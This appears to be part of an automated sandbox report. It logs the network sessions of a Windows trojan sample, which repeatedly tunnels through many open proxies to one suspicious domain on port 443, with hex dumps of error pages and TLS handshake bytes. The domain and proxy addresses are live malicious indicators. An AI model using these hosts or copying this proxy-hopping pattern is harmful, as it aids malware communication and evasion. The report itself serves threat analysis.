                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1387192.168.2.85217383.136.219.140805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.274097919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:16.421231985 CET830INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:29:16 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 638
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1388192.168.2.85382145.179.231.21056785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.274158955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1389192.168.2.852272154.12.255.155645605828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.280549049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.288714886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.382641077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.382826090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1390192.168.2.85340158.253.210.12288885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.290520906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1391192.168.2.85210351.210.45.148364245828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.291161060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382452011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.398433924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1392192.168.2.852259141.94.174.6496755828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.291237116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695005894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.000000000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1393192.168.2.85233945.70.236.12180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.291335106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.061881065 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1394192.168.2.85235647.180.63.37543215828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.292838097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1395192.168.2.85223145.225.207.1869995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.298433065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.637136936 CET19INHTTP/1.1 200 OK
                                                                                Feb 23, 2024 14:28:36.321914911 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1396192.168.2.8542218.213.128.9080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.298432112 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1397192.168.2.854000171.244.10.204430125828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.376257896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.398066044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.820555925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1398192.168.2.85420574.119.147.20941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:35.821548939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1399192.168.2.854145206.220.175.241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:35.821854115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1400192.168.2.852261139.59.73.2653505828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:35.821907997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.879504919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.898814917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.898144007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:59.897846937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:11.994079113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:24.022852898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1401192.168.2.8540678.213.129.1580605828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:35.837806940 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1402192.168.2.852294103.81.152.10835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:35.848855972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.879504919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.898814917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.898144007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1403192.168.2.852364107.180.90.42171535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:35.871870041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.879477024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1404192.168.2.85399872.217.158.20241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:35.875462055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1405192.168.2.853825195.158.18.23631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:35.875773907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.882659912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.882977962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1406192.168.2.854235187.19.127.25341535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:35.945154905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1407192.168.2.854244104.200.135.4641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.042007923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1408192.168.2.85423943.251.132.13380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.054193020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1409192.168.2.854245185.40.80.14341535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.054757118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1410192.168.2.85423847.243.114.19281805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.054867983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1411192.168.2.852519177.93.45.1549995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.081497908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.415189028 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1412192.168.2.85424243.133.136.20888005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.083669901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1413192.168.2.85424327.65.240.15710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.083755016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1414192.168.2.853588186.203.163.5356785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.083983898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1415192.168.2.852477114.5.199.219805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.103432894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.473464012 CET19INHTTP/1.1 200 OK
                                                                                Feb 23, 2024 14:28:41.532530069 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 88 fd 63 75 a6 2d 18 87 37 2a 11 fa 1d 4a b1 9d 46 fd f7 20 bc 24 b4 ec 2c c8 59 52 b8 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: ecu-7*JF $,YR*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#%w42m"gju)2kTuii5op
                                                                                Feb 23, 2024 14:28:41.972999096 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 9d 89 89 9e 58 a7 8a 78 72 50 71 3a 40 5d a0 5d e8 29 a7 de be 4d 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                Data Ascii: C?eXxrPq:@]])MDOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                Feb 23, 2024 14:28:41.973007917 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
                                                                                Feb 23, 2024 14:28:41.973026991 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                Feb 23, 2024 14:28:41.973121881 CET238INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y
